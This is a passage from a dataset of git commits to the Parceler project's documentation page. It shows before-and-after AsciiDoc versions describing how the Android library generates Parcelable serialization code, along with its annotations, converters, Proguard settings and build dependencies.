LibraryParcelConverter.class))\nclass SomeClass{}\n----\nThis allows for fine grained control over a class that isn't available for direct modification.\n\n=== Advanced configuration\n\n==== Skipping analysis\nIt is a common practice for some libraries to require a bean to extend a base class.\nAlthough it is not the most optimal case, Parceler supports this practice by allowing the configuration of which classes in the inheritance hierarchy to analyze, via the analyze parameter:\n\n[source, java]\n----\n@Parcel(analyze = {One.class, Three.class})\nclass One extends Two {}\nclass Two extends Three {}\nclass Three extends BaseClass {}\n----\n\nIn this example, only fields of the `One` and `Three` classes will be serialized, avoiding both the `BaseClass` and `Two` class
parameters.\n\n==== Specific wrapping\n\nThe `Parcels` utility class looks up the generated wrapper by the concrete class of the given instance.\nFor performance reasons this ignores inheritance, both super and base classes.\nThere are two solutions to this problem.\nFirst, one may specify additional types to associate to the given type via the `implementations` parameter:\n\n[source, java]\n----\nclass ExampleProxy extends Example {}\n@Parcel(implementations = {ExampleProxy.class})\nclass Example {}\n\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(proxy); \/\/ ExampleProxy will be serialized as an Example\n----\n\nSecond, one may also specify the class type when using the `Parcels.wrap()` method:\n\n[source, java]\n----\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(Example.class, proxy);\n----\n\n==== Configuring Proguard\n\nTo configure Proguard, add the following lines to your Proguard configuration file. These will keep files related to the `Parcels` utility class and the `Parcelable` `CREATOR` instance:\n\n----\n# Parceler library\n-keep interface org.parceler.Parcel\n-keep @org.parceler.Parcel class * { *; }\n-keep class **$$Parcelable { *; }\n----\n\n== Getting Parceler\n\nYou may download Parceler as a Maven dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler<\/artifactId>\n <version>{{site.currentVersion}}<\/version>\n <scope>provided<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler-api<\/artifactId>\n <version>{{site.currentVersion}}<\/version>\n<\/dependency>\n----\n\nor Gradle:\n[source,groovy]\n----\ncompile 'org.parceler:parceler-api:{{site.currentVersion}}'\nannotationProcessor 'org.parceler:parceler:{{site.currentVersion}}'\n----\n\nOr from http:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3A%22org.parceler%22[Maven Central].\n\n== License\n----\nCopyright 2011-2015 John Ericksen\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n----\n","old_contents":"---\nlayout: default\ntitle: Parceler\ndocumentationExpanded: false\npostsExpanded: false\n---\n\nHave a question? http:\/\/stackoverflow.com\/questions\/ask?tags=parceler[Ask it on StackOverflow.]\n\nFound an issue?
https:\/\/github.com\/johncarl81\/parceler\/issues\/new[Please report it.]\n\nimage:https:\/\/badges.gitter.im\/johncarl81\/parceler.svg[link=\"https:\/\/gitter.im\/johncarl81\/parceler?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge\"]\n\n=== Introduction\n\nIn Android, http:\/\/developer.android.com\/reference\/android\/os\/Parcelable.html[Parcelables] are a great way to serialize Java Objects between Contexts.\nhttp:\/\/www.developerphil.com\/parcelable-vs-serializable\/[Compared] with traditional Serialization, Parcelables take on the order of 10x less time to both serialize and deserialize.\nThere is a major flaw with Parcelables, however.\nParcelables contain a ton of boilerplate code.\nTo implement a Parcelable, you must mirror the `writeToParcel()` and `createFromParcel()` methods such that they read and write to the Parcel in the same order.\nAlso, a Parcelable must define a `public static final Parcelable.Creator CREATOR` in order for the Android infrastructure to be able to leverage the serialization code.\n\nParceler is a code generation library that generates the Android Parcelable boilerplate source code.\nNo longer do you have to implement the Parcelable interface, the `writeToParcel()` or `createFromParcel()` or the `public static final CREATOR`.\nYou simply annotate a POJO with `@Parcel` and Parceler does the rest.\nBecause Parceler uses the Java JSR-269 Annotation Processor, there is no need to run a tool manually to generate the Parcelable code.\nJust annotate your Java Bean, compile and you are finished.\nBy default, Parceler will serialize the fields of your instance directly:\n\n[source,java]\n----\n@Parcel\npublic class Example {\n String name;\n int age;\n\n public Example() {}\n\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nBe careful not to use private fields when using the default field serialization strategy as it will incur a performance penalty due to reflection.\n\nTo use the generated code, you may reference the generated class directly, or via the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrapped = Parcels.wrap(new Example(\"Andy\", 42));\n----\n\nTo dereference the `@Parcel`, just call the `Parcels.unwrap()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(wrapped);\nexample.getName(); \/\/ Andy\nexample.getAge(); \/\/ 42\n----\n\nOf course, the wrapped `Parcelable` can be added to an Android Bundle to transfer from Activity to Activity:\n\n[source,java]\n----\nBundle bundle = new Bundle();\nbundle.putParcelable(\"example\", Parcels.wrap(example));\n----\n\nAnd dereferenced in the `onCreate()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(getIntent().getParcelableExtra(\"example\"));\n----\n\nThis wrapping and unwrapping technique plays well with the Intent Factory pattern.\nIn addition, Parceler is supported by the following libraries:\n\n * http:\/\/androidtransfuse.org\/documentation.html#parcel[Transfuse] - Allows `@Parcel` annotated beans to be used with the `@Extra` injection.\n * https:\/\/github.com\/MarcinMoskala\/ActivityStarter\/wiki\/Parceler-Arg-Converter-usage[ActivityStarter] - Uses ParcelarArgConverter to allow to use Parceler objects as an arguments passed to Activities (Fragments, Services etc.).\n * https:\/\/github.com\/sockeqwe\/fragmentargs#argsbundler[FragmentArgs] - Uses the `ParcelerArgsBundler` adapter to wrap and unwrap 
`@Parcel` annotated beans with fragment parameters.\n * https:\/\/github.com\/f2prateek\/dart[Dart] - Autodetects `@Parcel` annotated beans and automatically unwraps them when using `@InjectExtra`.\n * http:\/\/androidannotations.org\/[AndroidAnnotations] - Autodetects `@Parcel` annotated beans and https:\/\/github.com\/excilys\/androidannotations\/wiki\/ParcelerIntegration[automatically wraps\/unwraps] them when using `@Extra`, `@FragmentArg`, `@InstanceState` and other `Bundle` related annotations.\n\n=== Parcel attribute types\nOnly a select number of types may be used as attributes of a `@Parcel` class.\nThe following list includes the mapped types:\n\n * `byte`\n * `double`\n * `float`\n * `int`\n * `long`\n * `char`\n * `boolean`\n * `String`\n * `IBinder`\n * `Bundle`\n * `SparseArray` of any of the mapped types*\n * `SparseBooleanArray`\n * `ObservableField`\n * `List`, `ArrayList` and `LinkedList` of any of the mapped types*\n * `Map`, `HashMap`, `LinkedHashMap`, `SortedMap`, and `TreeMap` of any of the mapped types*\n * `Set`, `HashSet`, `SortedSet`, `TreeSet`, `LinkedHashSet` of any of the mapped types*\n * `Parcelable`\n * `Serializable`\n * Array of any of the mapped types\n * Any other class annotated with `@Parcel`\n\n*Parcel will error if the generic parameter is not mapped.\n\nParceler also supports any of the above types directly.\nThis is especially useful when dealing with collections of classes annotated with `@Parcel`:\n\n[source,java]\n----\nParcelable listParcelable = Parcels.wrap(new ArrayList<Example>());\nParcelable mapParcelable = Parcels.wrap(new HashMap<String, Example>());\n----\n\n==== Polymorphism\nNote that Parceler does not unwrap inheritance hierarchies, so any polymorphic fields will be unwrapped as instances of the base class.\nThis is because Parceler opts for performance rather than checking `.getClass()` for every piece of data.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n public Parent p;\n @ParcelConstructor Example(Parent p) { this.p = p; }\n}\n\n@Parcel public class Parent {}\n@Parcel public class Child extends Parent {}\n----\n\n[source,java]\n----\nExample example = new Example(new Child());\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ true\nexample = Parcels.unwrap(Parcels.wrap(example));\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ false\n----\n\nRefer to the <<custom_serialization,Custom Serialization>> section for an example of working with polymorphic fields.\n\n=== Serialization techniques\n\nParceler offers several choices for how to serialize and deserialize an object in addition to the field-based serialization seen above.\n\n==== Getter\/setter serialization\nParceler may be configured to serialize using getter and setter methods and a non-empty constructor.\nIn addition, fields, methods and constructor parameters may be associated using the `@ParcelProperty` annotation.\nThis supports a number of bean strategies including immutability and traditional getter\/setter beans.\n\nTo configure default method serialization, simply configure the `@Parcel` annotation with `Serialization.BEAN`:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private String name;\n private int age;\n\n public String getName() { return name; }\n public void setName(String name) { this.name = name; }\n\n public int getAge() { return age; }\n public void setAge(int age) { this.age = age; }\n}\n----\n\nTo use a constructor with serialization, annotate the desired constructor with the 
Parceler supports many different styles centering around the POJO.\nThis allows `@Parcel` annotated classes to be used with other POJO based libraries, including the following:\n\n * https:\/\/code.google.com\/p\/google-gson\/[GSON]\n * https:\/\/realm.io\/docs\/java\/latest\/#parceler[Realm]\n * https:\/\/bitbucket.org\/littlerobots\/cupboard[Cupboard]\n * http:\/\/simple.sourceforge.net\/[Simple XML]\n * https:\/\/github.com\/Raizlabs\/DBFlow[DBFlow]\n\n==== Static Factory support\nAs an alternative to using a constructor directly, Parceler supports using an annotated Static Factory to build an instance of the given class.\nThis style supports Google's https:\/\/github.com\/google\/auto\/tree\/master\/value[AutoValue] annotation processor \/ code generation library for generating immutable beans.\nParceler interfaces with AutoValue via the `@ParcelFactory` annotation, which maps a static factory method into the annotated `@Parcel` serialization:\n\n[source,java]\n----\n@AutoValue\n@Parcel\npublic abstract class AutoValueParcel {\n\n @ParcelProperty(\"value\") public abstract String value();\n\n @ParcelFactory\n public static AutoValueParcel create(String value) {\n return new AutoValue_AutoValueParcel(value);\n }\n}\n----\n\nAutoValue generates a different class than the annotated `@Parcel`, therefore, you need to specify which class Parceler should build in the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrappedAutoValue = Parcels.wrap(AutoValueParcel.class, AutoValueParcel.create(\"example\"));\n----\nAnd to deserialize:\n[source,java]\n----\nAutoValueParcel autoValueParcel = Parcels.unwrap(wrappedAutoValue);\n----\n\n==== Custom serialization\n`@Parcel` includes an optional parameter to include a manual serializer `ParcelConverter` for the case where special serialization is necessary.\nThis still provides a cleaner option for using Parcelable classes than implementing them by hand.\n\nThe following code demonstrates using a `ParcelConverter` to unwrap the inheritance hierarchy during deserialization.\n\n[source,java]\n----\n@Parcel\npublic class Item {\n @ParcelPropertyConverter(ItemListParcelConverter.class)\n public List<Item> itemList;\n}\n@Parcel public class SubItem1 extends Item {}\n@Parcel public class SubItem2 extends Item {}\n\npublic class ItemListParcelConverter implements ParcelConverter<List<Item>> {\n @Override\n public void toParcel(List<Item> input, Parcel parcel) {\n if (input == null) {\n parcel.writeInt(-1);\n }\n else {\n parcel.writeInt(input.size());\n for (Item item : input) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n }\n }\n\n @Override\n public List<Item> fromParcel(Parcel parcel) {\n int size = parcel.readInt();\n if (size < 0) return null;\n List<Item> items = new ArrayList<Item>();\n for (int i = 0; i < size; ++i) {\n items.add((Item) Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader())));\n }\n return items;\n }\n}\n----\n\nParceler is also packaged with a series of base classes to make Collection conversion easier, located under the `org.parceler.converter` package of the API.\nThese base classes take care of a variety of difficult or verbose jobs dealing with Collections, including null checks and collection iteration.\nFor instance, the above `ParcelConverter` could be written using the `ArrayListParcelConverter`:\n\n[source,java]\n----\npublic class ItemListParcelConverter extends ArrayListParcelConverter<Item> {\n @Override\n public void itemToParcel(Item item, Parcel parcel) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n\n @Override\n public Item itemFromParcel(Parcel parcel) {\n return Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader()));\n }\n}\n----\n\n=== Classes without Java source\nFor classes whose corresponding Java source is not available, one may include the class as a Parcel by using the `@ParcelClass` annotation.\nThis annotation may be declared anywhere in the compiled source that is convenient.\nFor instance, one could include the `@ParcelClass` along with the Android Application:\n\n[source,java]\n----\n@ParcelClass(LibraryParcel.class)\npublic class AndroidApplication extends Application{\n \/\/...\n}\n----\n\nMultiple `@ParcelClass` annotations may be declared using the `@ParcelClasses` annotation.\n
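For example, a minimal sketch, assuming `@ParcelClasses` accepts an array of `@ParcelClass` annotations (the second library class here is hypothetical):\n\n[source,java]\n----\n@ParcelClasses({\n @ParcelClass(LibraryParcel.class),\n @ParcelClass(AnotherLibraryParcel.class)\n})\npublic class AndroidApplication extends Application {\n \/\/...\n}\n----\n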
In addition, classes referenced by `@ParcelClass` may be configured using the `@Parcel` annotation.\nThis allows serialization to be configured through any parameter available on the `@Parcel` annotation, including the serialization technique or classes to analyze.\n\nOne useful technique is the ability to define global custom converters for a type:\n[source,java]\n----\n@ParcelClass(\n value = LibraryParcel.class,\n annotation = @Parcel(converter = LibraryParcelConverter.class))\nclass SomeClass{}\n----\nThis allows for fine-grained control over a class that isn't available for direct modification.\n
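A converter referenced this way is an ordinary `ParcelConverter` implementation.\nA minimal sketch, assuming a hypothetical `LibraryParcel` that exposes a single `String` value through a getter and constructor, might look like:\n\n[source,java]\n----\npublic class LibraryParcelConverter implements ParcelConverter<LibraryParcel> {\n @Override\n public void toParcel(LibraryParcel input, Parcel parcel) {\n parcel.writeString(input.getValue()); \/\/ assumed accessor\n }\n\n @Override\n public LibraryParcel fromParcel(Parcel parcel) {\n return new LibraryParcel(parcel.readString()); \/\/ assumed constructor\n }\n}\n----\n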
=== Advanced configuration\n\n==== Skipping analysis\nIt is a common practice for some libraries to require a bean to extend a base class.\nAlthough it is not the most optimal case, Parceler supports this practice by allowing the configuration of what classes in the inheritance hierarchy to analyze via the analyze parameter:\n\n[source, java]\n----\n@Parcel(analyze = {One.class, Three.class})\nclass One extends Two {}\nclass Two extends Three {}\nclass Three extends BaseClass {}\n----\n\nIn this example, only fields of the `One` and `Three` classes will be serialized, avoiding both the `BaseClass` and `Two` class parameters.\n\n==== Specific wrapping\n\nThe Parcels utility class looks up the given class for wrapping by class.\nFor performance reasons this ignores inheritance, both super and base classes.\nThere are two solutions to this problem.\nFirst, one may specify additional types to associate to the given type via the `implementations` parameter:\n\n[source, java]\n----\nclass ExampleProxy extends Example {}\n@Parcel(implementations = {ExampleProxy.class})\nclass Example {}\n\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(proxy); \/\/ ExampleProxy will be serialized as an Example\n----\n\nSecond, one may also specify the class type when using the `Parcels.wrap()` method:\n\n[source, java]\n----\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(Example.class, proxy);\n----\n\n==== Configuring Proguard\n\nTo configure Proguard, add the following lines to your Proguard configuration file. These will keep files related to the `Parcels` utility class and the `Parcelable` `CREATOR` instance:\n\n----\n# Parceler library\n-keep interface org.parceler.Parcel\n-keep @org.parceler.Parcel class * { *; }\n-keep class **$$Parcelable { *; }\n----\n\n== Getting Parceler\n\nYou may download Parceler as a Maven dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler<\/artifactId>\n <version>{{site.currentVersion}}<\/version>\n <scope>provided<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler-api<\/artifactId>\n <version>{{site.currentVersion}}<\/version>\n<\/dependency>\n----\n\nor Gradle:\n[source,groovy]\n----\ncompile 'org.parceler:parceler-api:{{site.currentVersion}}'\nannotationProcessor 'org.parceler:parceler:{{site.currentVersion}}'\n----\n\nOr from http:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3A%22org.parceler%22[Maven Central].\n\n== License\n----\nCopyright 2011-2015 John Ericksen\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9f29ad5fdb4b208f980cb6350e3c517c67ca468a","subject":"updated anchor name","message":"updated anchor name","repos":"johncarl81\/parceler-site,johncarl81\/parceler-site,johncarl81\/parceler-site","old_file":"index.adoc","new_file":"index.adoc","new_contents":"---\nlayout: default\ntitle: Parceler\ndocumentationExpanded: false\npostsExpanded: false\n---\n\n=== Introduction\n\nIn Android, http:\/\/developer.android.com\/reference\/android\/os\/Parcelable.html[Parcelables] are a great way to serialize Java Objects between Contexts.\nhttp:\/\/www.developerphil.com\/parcelable-vs-serializable\/[Compared] with traditional Serialization, Parcelables take on the order of 10x less time to both serialize and deserialize.\nThere is a major flaw with Parcelables, however.\nParcelables contain a ton of boilerplate code.\nTo implement a Parcelable, you must mirror the `writeToParcel()` and `createFromParcel()` methods such that they read and write to the Parcel in the same order.\nAlso, a Parcelable must define a `public static final 
Parcelable.Creator CREATOR` in order for the Android infrastructure to be able to leverage the serialization code.\n\nParceler is a code generation library that generates the Android Parcelable boilerplate source code.\nNo longer do you have to implement the Parcelable interface, the `writeToParcel()` or `createFromParcel()` or the `public static final CREATOR`.\nYou simply annotate a POJO with `@Parcel` and Parceler does the rest.\nBecause Parceler uses the Java JSR-269 Annotation Processor, there is no need to run a tool manually to generate the Parcelable code.\nJust annotate your Java Bean, compile and you are finished.\nBy default, Parceler will serialize the fields of your instance directly:\n\n[source,java]\n----\n@Parcel\npublic class Example {\n String name;\n int age;\n\n public Example(){ \/*Required empty bean constructor*\/ }\n\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nBe careful not to use private fields when using the default field serialization strategy as it will incur a performance penalty due to reflection.\n\nTo use the generated code, you may reference the generated class directly, or via the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrapped = Parcels.wrap(new Example(\"Andy\", 42));\n----\n\nTo dereference the `@Parcel`, just call the `Parcels.unwrap()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(wrapped);\nexample.getName(); \/\/ Andy\nexample.getAge(); \/\/ 42\n----\n\nOf course, the wrapped `Parcelable` can be added to an Android Bundle to transfer from Activity to Activity:\n\n[source,java]\n----\nBundle bundle = new Bundle();\nbundle.putParcelable(\"example\", Parcels.wrap(example));\n----\n\nAnd dereferenced in the `onCreate()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(this.getIntent().getExtras().get(\"example\"));\n----\n\nThis wrapping and unwrapping technique plays well with the Intent Factory pattern.\nIn addition, Parceler is supported by the following libraries:\n\n * http:\/\/androidtransfuse.org\/documentation.html#parcel[Transfuse] - Allows `@Parcel` annotated beans to be used with the `@Extra` injection.\n * https:\/\/github.com\/sockeqwe\/fragmentargs#argsbundler[FragmentArgs] - Uses the `ParcelerArgsBundler` adapter to wrap and unwrap `@Parcel` annotated beans with fragment parameters.\n * https:\/\/github.com\/f2prateek\/dart[Dart] - Autodetects `@Parcel` annotated beans and automatically unwraps them when using `@InjectExtra`.\n\n=== Parcel attribute types\nOnly a select number of types may be used as attributes of a `@Parcel` class.\nThe following list includes the mapped types:\n\n * `byte`\n * `double`\n * `float`\n * `int`\n * `long`\n * `char`\n * `boolean`\n * `String`\n * `IBinder`\n * `Bundle`\n * `SparseArray` of any of the mapped types*\n * `SparseBooleanArray`\n * `List`, `ArrayList` and `LinkedList` of any of the mapped types*\n * `Map`, `HashMap`, `LinkedHashMap`, `SortedMap`, and `TreeMap` of any of the mapped types*\n * `Set`, `HashSet`, `SortedSet`, `TreeSet`, `LinkedHashSet` of any of the mapped types*\n * `Parcelable`\n * `Serializable`\n * Array of any of the mapped types\n * Any other class annotated with `@Parcel`\n\n*Parcel will error if the generic parameter is not mapped.\n\nParceler also supports any of the above types directly.\nThis is especially useful when dealing with collections of classes annotated with 
`@Parcel`:\n\n[source,java]\n----\nParcelable listParcelable = Parcels.wrap(new ArrayList<Example>());\nParcelable mapParcelable = Parcels.wrap(new HashMap<String, Example>());\n----\n\n==== Polymorphism\nNote that Parceler does not unwrap inheritance hierarchies, so any polymorphic fields will be unwrapped as instances of the base class.\nThis is because Parceler opts for performance rather than checking `.getClass()` for every piece of data.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n public Parent p;\n Example(Parent p) { this.p = p; }\n}\n\n@Parcel public class Parent {}\n@Parcel public class Child extends Parent {}\n----\n\n[source,java]\n----\nExample example = new Example(new Child());\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ true\nexample = Parcels.unwrap(Parcels.wrap(example));\nSystem.out.println(\"%b\", example.p instanceof Child); \/\/ false\n----\n\nRefer to the <<custom_serialization,Custom Serialization>> section for an example of working with polymorphic fields.\n\n=== Serialization techniques\n\nParceler offers several choices for how to serialize and deserialize an object in addition to the field-based serialization seen above.\n\n==== Getter\/setter serialization\nParceler may be configured to serialize using getter and setter methods and a non-empty constructor.\nIn addition, fields, methods and constructor parameters may be associated using the `@ParcelProperty` annotation.\nThis supports a number of bean strategies including immutability and traditional getter\/setter beans.\n\nTo configure default method serialization, simply configure the `@Parcel` annotation with `Serialization.BEAN`:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private String name;\n private int age;\n\n public String getName() { return name; }\n public void setName(String name) { this.name = name; }\n\n public int getAge() { return age; }\n public void setAge(int age) { this.age = age; }\n}\n----\n\nTo use a constructor with serialization, annotate the desired constructor with the `@ParcelConstructor` annotation:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private final String name;\n private final int age;\n\n @ParcelConstructor\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nIf an empty constructor is present, Parceler will use that constructor unless another constructor is annotated.\n\n==== Mixing getters\/setters and fields\nYou may also mix and match serialization techniques using the `@ParcelProperty` annotation.\nIn the following example, `firstName` and `lastName` are written to the bean using the constructor while `firstName` is read from the bean using the field and `lastName` is read using the `getLastName()` method.\nThe parameters `firstName` and `lastName` are coordinated by the parameter names `\"first\"` and `\"last\"` respectfully.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n @ParcelProperty(\"first\")\n String firstName;\n String lastName;\n\n @ParcelConstructor\n public Example(@ParcelProperty(\"first\") String firstName, @ParcelProperty(\"last\") String lastName){\n this.firstName = firstName;\n this.lastName = lastName;\n }\n\n public String getFirstName() { return firstName; }\n\n @ParcelProperty(\"last\")\n public String getLastName() { return lastName; }\n}\n----\n\nFor attributes that should not be serialized with Parceler, the 
attribute field, getter or setter may be annotated by `@Transient`.\n\nParceler supports many different styles centering around the POJO.\nThis allows `@Parcel` annotated classes to be used with other POJO based libraries, including https:\/\/code.google.com\/p\/google-gson\/[GSON], https:\/\/bitbucket.org\/qbusict\/cupboard[Cupboard], and http:\/\/simple.sourceforge.net\/[Simple XML] to name a few.\n\n==== Static Factory support\nAs an alternative to using a constructor directly, Parceler supports using an annotated Static Factory to build an instance of the given class.\nThis style supports Google's https:\/\/github.com\/google\/auto\/tree\/master\/value[AutoValue] annoation processor \/ code generation library for generating immutable beans.\nParceler interfaces with AutoValue via the `@ParcelFactory` annotation, which maps a static factory method into the annotated `@Parcel` serialization:\n\n[source,java]\n----\n@AutoValue\n@Parcel\npublic abstract class AutoValueParcel {\n\n @ParcelProperty(\"value\") public abstract String value();\n\n @ParcelFactory\n public static AutoValueParcel create(String value) {\n return new AutoValue_AutoValueParcel(value);\n }\n}\n----\n\nAutoValue generates a different class than the annotated `@Parcel`, therefore, you need to specify which class Parceler should build in the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrappedAutoValue = Parcels.wrap(AutoValueParcel.class, AutoValueParcel.create(\"example\"));\n----\nAnd to deserialize:\n[source,java]\n----\nAutoValueParcel autoValueParcel = Parcels.unwrap(wrappedAutoValue);\n----\n\n==== Custom serialization\n`@Parcel` includes an optional parameter to include a manual serializer `ParcelConverter` for the case where special serialization is necessary.\nThis provides a still cleaner option for using Parcelable classes than implementing them by hand.\n\nThe following code demonstrates using a `ParcelConverter` to unwrap the inheritance hierarchy during deserialization.\n\n[source,java]\n----\n@Parcel\npublic class Item {\n @ParcelPropertyConverter(ItemListParcelConverter.class)\n public List<Item> itemList;\n}\n@Parcel public class SubItem1 extends Item {}\n@Parcel public class SubItem2 extends Item {}\n\npublic class ItemListParcelConverter implements ParcelConverter<List<Item>> {\n @Override\n public void toParcel(List<Item> input, Parcel parcel) {\n if (input == null) {\n parcel.writeInt(-1);\n }\n else {\n parcel.writeInt(input.size());\n for (Item item : input) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n }\n }\n\n @Override\n public List<Item> fromParcel(Parcel parcel) {\n int size = parcel.readInt();\n if (size < 0) return null;\n List<Item> items = new ArrayList<Item>();\n for (int i = 0; i < size; ++i) {\n items.add((Item) Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader())));\n }\n return items;\n }\n}\n----\n\n=== Classes without Java source\nFor classes whose corresponding Java source is not available, one may include the class as a Parcel by using the `@ParcelClass` annotation.\nThis annotation may be declared anywhere in the compiled source that is convenient.\nFor instance, one could include the `@ParcelClass` along with the Android Application:\n\n[source,java]\n----\n@ParcelClass(LibraryParcel.class)\npublic class AndroidApplication extends Application{\n \/\/...\n}\n----\n\nMultiple `@ParcelClass` annotations may be declared using the `@ParcelClasses` annotation.\n\n=== Advanced configuration\n\n==== Skipping analysis\nIt is a common practice for 
some libraries to require a bean to extend a base class.\nAlthough it is not the most optimal case, Parceler supports this practice by allowing the configuration of what classes in the inheritance hierarchy to analyze via the analyze parameter:\n\n[source, java]\n----\n@Parcel(analyze = {One.class, Three.class})\nclass One extends Two {}\nclass Two extends Three {}\nclass Three extends BaseClass {}\n----\n\nIn this example, only fields of the `One` and `Three` classes will be serialized, avoiding both the `BaseClass` and `Two` class parameters.\n\n==== Specific wrapping\n\nThe Parcels utility class looks up the given class for wrapping by class.\nFor performance reasons this ignores inheritance, both super and base classes.\nThere are two solutions to this problem.\nFirst, one may specify additional types to associate to the given type via the `implementations` parameter:\n\n[source, java]\n----\nclass ExampleProxy extends Example {}\n@Parcel(implementations = {ExampleProxy.class})\nclass Example {}\n\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(proxy); \/\/ ExampleProxy will be serialized as a Example\n----\n\nSecond, one may also specify the class type when using the `Parcels.wrap()` method:\n\n[source, java]\n----\nExampleProxy proxy = new ExampleProxy();\nParcels.wrap(Example.class, proxy);\n----\n\n==== Avoiding Parcels indexing\n\nUsing Parceler in libraries can be challenging because Parceler writes a single mapping class `Parceler$$Parcels` to associate a given type with a `Parcelable`.\nThis mapping class can collide giving the following error during compilation:\n\n[source, bash]\n----\nError Code:\n 2\nOutput:\n UNEXPECTED TOP-LEVEL EXCEPTION:\n com.android.dex.DexException: Multiple dex files define Lorg\/parceler\/Parceler$$Parcels$1;\n at com.android.dx.merge.DexMerger.readSortableTypes(DexMerger.java:594)\n at com.android.dx.merge.DexMerger.getSortedTypes(DexMerger.java:552)\n at com.android.dx.merge.DexMerger.mergeClassDefs(DexMerger.java:533)\n ....\n----\n\nTo avoid writing this common mapping class, set `parcelsIndex = false` to each of the library classes.\nParceler will not write a `Parceler$$Parcels` mapping class if no indexable classes exist and the Parcels utiltiy class will fallback to looking up the generated class by name.\n\nAlternatively, using `@ParcelClass` in the root project, instead of annotating classes directly in the library can avoid this issue.\n\n==== Configuring Proguard\n\nTo configure Proguard, add the following lines to your proguard configuration file. 
These will keep files related to the `Parcels` utilty class and the `Parcelable` `CREATOR` instance:\n\n----\n# Parcel library\n-keep class * implements android.os.Parcelable {\n public static final android.os.Parcelable$Creator *;\n}\n\n-keep class org.parceler.Parceler$$Parcels\n----\n\n== Getting Parceler\n\nYou may download Parceler as a Maven dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler<\/artifactId>\n <version>${parceler.version}<\/version>\n <scope>provided<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.parceler<\/groupId>\n <artifactId>parceler-api<\/artifactId>\n <version>${parceler.version}<\/version>\n<\/dependency>\n----\n\nor Gradle:\n[source,groovy]\n----\ncompile \"org.parceler:parceler-api:${parcelerVersion}\"\napt \"org.parceler:parceler:${parcelerVersion}\"\n----\n\nOr from http:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3A%22org.parceler%22[Maven Central].\n\n== License\n----\nCopyright 2011-2015 John Ericksen\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n----\n","old_contents":"---\nlayout: default\ntitle: Parceler\ndocumentationExpanded: false\npostsExpanded: false\n---\n\n=== Introduction\n\nIn Android, http:\/\/developer.android.com\/reference\/android\/os\/Parcelable.html[Parcelables] are a great way to serialize Java Objects between Contexts.\nhttp:\/\/www.developerphil.com\/parcelable-vs-serializable\/[Compared] with traditional Serialization, Parcelables take on the order of 10x less time to both serialize and deserialize.\nThere is a major flaw with Parcelables, however.\nParcelables contain a ton of boilerplate code.\nTo implement a Parcelable, you must mirror the `writeToParcel()` and `createFromParcel()` methods such that they read and write to the Parcel in the same order.\nAlso, a 